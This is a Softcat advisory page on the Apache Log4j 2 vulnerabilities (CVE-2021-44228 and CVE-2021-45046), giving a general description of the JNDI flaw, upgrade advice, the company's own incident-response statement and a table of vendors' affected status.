Skip to main content

Apache Log4j 2 Vulnerability Notice

 

CVE-2021-45046

Softcat is aware of a further release of the above CVE in relation to this Apache log4j vulnerability, in which certain non standard configurations can lead to some deployments of log4j (versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0) vulnerable to a denial of service attack. This vulnerability does not carry the same risk as CVE-2021-44228, and has a much lower CVSS score (3.7). Finally, Version 2.16 (the recommended fix for this vulnerability) completely depreciates the vulnerable JNDI functionality. More information on this vulnerability can be found here.

 

What we know so far

Log4j 2 is an open-source Java logging library developed by the Apache Foundation. It is widely used in many applications and is present in many services as a dependency. This includes enterprise applications , including custom applications developed within an organisation, as well as numerous cloud services The Log4j 2 library is frequently used in enterprise Java software and is included in Apache frameworks including:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

Apache Log4j2 on versions 2.14.1 or lower have JNDI features used in configuration, log messages, and parameters that do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

 

What can customers do about it?

The most important fix available for this vulnerability is to update to version 2.16.0 or later, and where using a third party application ensuring you update products as releases become available. 

 

Statement from Softcat:

Softcat’s Information Security team, with the assistance of our Cyber Services team, have been responding to the Log4J vulnerability since we became aware on the 10th December. This issue has board level visibility and ensuring Softcat remain resilient against this new vulnerability is a priority for us.  

Since becoming aware our teams began utilising several overlapping techniques to identify the presence of Log4J in our estate, initially focusing on externally facing resources and continuing to those in our private networks. We have completed an assessment of external facing applications and have not identified any that are vulnerable. Where we have identified software vendors used on our private network (not internet facing) that include Log4J as a component we are utilising a combinations of detective and protective security controls to mitigate the risk while fixes from the vendor are deployed. Not all services utilising a vulnerable version of log4j can be exploited or easily exploited and we have prioritised them accordingly. Because this is a multifaceted effort, there is no single ETA for blanket remediation.

We can confirm our ecommerce platform, eCAT, does not use Log4J.

Customers of Softcat’s own managed service offerings can contact their service delivery manager to get a detailed update for the service/s they are consuming. Software utilised by some customers of Softcat’s Backup as a Service and Manage Print Service offerings is impacted and fixes have been released by the vendor to address this vulnerability. Customer contacts for these services have been notified by our service delivery team who are able to assist customers with any additional questions.

We have observed no indications that any systems or data has been compromised, and remain vigilant to any events related to log4j exploits.

 

Updates from our vendors

We want to ensure our customers are protected and kept in the loop with the latest updates from our Vendors. 

Softcat has been monitoring the vendor ecosystem since the release of this vulnerability on 10th December 2021, and is reguarly updating the below tables. Vendors are grouped into one of four categories, and where possible references are provided:

Classification Definition
Confirmed At least one product is vulnerable.
Under Investigation Vendor is currently reviewing their posture.
Not Affected Vendor has stated no products are vulnerable.
Awaiting Communication No release from Vendor was found.

 

The current list of vendors is as follows:

Vendor  Is affected? Reference available
Adobe Confirmed Read Here
Akamai Confirmed Read Here
AlienVault/AT&T Not Affected Softcat Confirmed Directly with AlienVault
Amazon Web Services Confirmed Read Here
APC Awaiting Communication  
Apple Confirmed Icloud Vulnerable, No Reference Available
Arcserve Not Affected Confirmed Directly with Arcserve, No Reference Available
Arista Confirmed Read Here
Attivo Awaiting Communication  
Avaya Confirmed Read Here
Barracuda Not Affected Read Here
Beyond Trust Awaiting Communication  
BitDefender Under Investigation Read Here
Blackberry Awaiting Communication  
BMC Software Confirmed Read Here
Carbon Black Confirmed Read Here
Cato Networks Not Affected Read Here
Check Point Not Affected Read Here
Cisco Systems Confirmed Read Here
Citrix Systems Under Investigation Read Here
Cloudhealth Under Investigation Read Here
Cohesity Not Affected Read Here
CommVault Confirmed Read Here
Corero Awaiting Communication  
Crowdstrike Not Affected Read Here
CyberArk Confirmed Read Here
CyberReason Not Affected Read Here
Cylance Awaiting Communication  
Datto Not Affected Read Here
Dell Confirmed Read Here
Docusign Not Affected Read Here
Druva Under Investigation Read Here
DuoSecurity Confirmed Read Here
Edgenexus Not Affected Softcat Confirmed Directly with Edgenexus
Egress Confirmed Read Here
Elastic Confirmed Read Here
F5 Networks Under Investigation Read Here
Forcepoint Confirmed Read Here
Forescout Confirmed Read Here
Fortinet Confirmed Read Here
F-Secure Confirmed Read Here
Gemalto Awaiting Communication  
GN Awaiting Communication  
Google Confirmed Read Here
GrayLog Confirmed Read Here
Hewlett Packard Enterprise

Confirmed

Read Here
HP Inc Awaiting Communication  
Huawei Confirmed Read Here
iManage (Zendesk) Confirmed Read Here
IBM Confirmed Read Here
IBM Licence Metric Tool Confirmed Read Here
Imperva Not Affected Read Here
Indeni Not Affected Softcat Confirmed Directly with Indeni
Informatica Confirmed Read Here
Infortrend Awaiting Communication  
Ivanti Confirmed Read Here
Jamf Confirmed Read Here
Jenkins Under Investigation Read Here
Jira Confirmed Read Here
Kaspersky Not Affected Read Here
Kemp Not Affected Read Here
Knowbe4 Awaiting Communication  
LastPass Confirmed Read Here
Lenovo Confirmed Read Here
LogRhythm Confirmed Read Here
ManagedEngine Confirmed Read Here
McAfee Under Investigation Read Here
Microfocus Confirmed Read Here
Microsoft Under Investigation Read Here
Mimecast Not Affected Read Here
N-able Not Affected Read Here
NetApp Confirmed Read Here
Netmotion Awaiting Communication  
Netwrix Confirmed Read Here
New Relic Confirmed Read Here
Nutanix Confirmed Read Here
Okta Confirmed Read Here
One Login Awaiting Communication  
OneIdentity Under Investigation Read Here
Opswat Awaiting Communication  
Oracle Confirmed Read Here
Origin Storage Solutions Awaiting Communication  
Palo Alto Not Affected Read Here
Patch My PC Awaiting Communication  
PingIdentity Under Investigation Read Here
Poly Awaiting Communication  
Proofpoint Confirmed Read Here
Pulse Secure Not Affected Read Here
Puppet Confirmed Read Here
Pure Storage Confirmed Read Here
Qlik Confirmed Read Here
Qualys Confirmed Read Here
Quest Confirmed Read Here
Rapid7 Under Investigation Read Here
Red Hat Confirmed Read Here
Riverbed Confirmed Read Here
RSA Confirmed Read Here
Rubrik Confirmed Read Here
SailPoint Under Investigation Read Here
Salesforce Under Investigation Read Here
Samsung Awaiting Communication  
SAP Confirmed Read Here
Science Logic Not Affected Read Here
SecurEnvoy Awaiting Communication  
SentinelOne Not Affected Read Here
ServiceNow Under Investigation Read Here
Siemens Confirmed Read Here
Skybox Confirmed Read Here
Snow Software Confirmed Read Here
Solarwinds Confirmed Read Here
SonicWALL Confirmed Read Here
Sophos Confirmed Read Here
SpanningCloud Apps Awaiting Communication  
Splunk Confirmed Read Here
STEALTHbits Awaiting Communication  
Swimlane Not Affected Softcat Confirmed Directly with Swimlane
Symantec Confirmed Read Here
SysAid Confirmed Read Here
Tableau Confirmed Read Here
Tanium Not Affected Read Here
TeamViewer Confirmed Read Here
Tenable Network Security Under Investigation Softcat Confirmed Directly with Tenable
Thales Confirmed Read Here
ThousandEye Confirmed Read Here
Trend Micro Under Investigation Read Here
Tripwire Confirmed Read Here
Trustwave Not Affected Read Here
Tufin Software Awaiting Communication  
Ubiquiti Confirmed Read Here
Varonis Under Investigation Read Here
Veeam Not Affected Read Here
Veritas Confirmed Read Here
VMware Confirmed Read Here
WatchGuard Not Affected Read Here
Yealink Awaiting Communication  
Zebra Technologies Confirmed Read Here
Zoom Awaiting Communication  
Zscaler Not Affected Read Here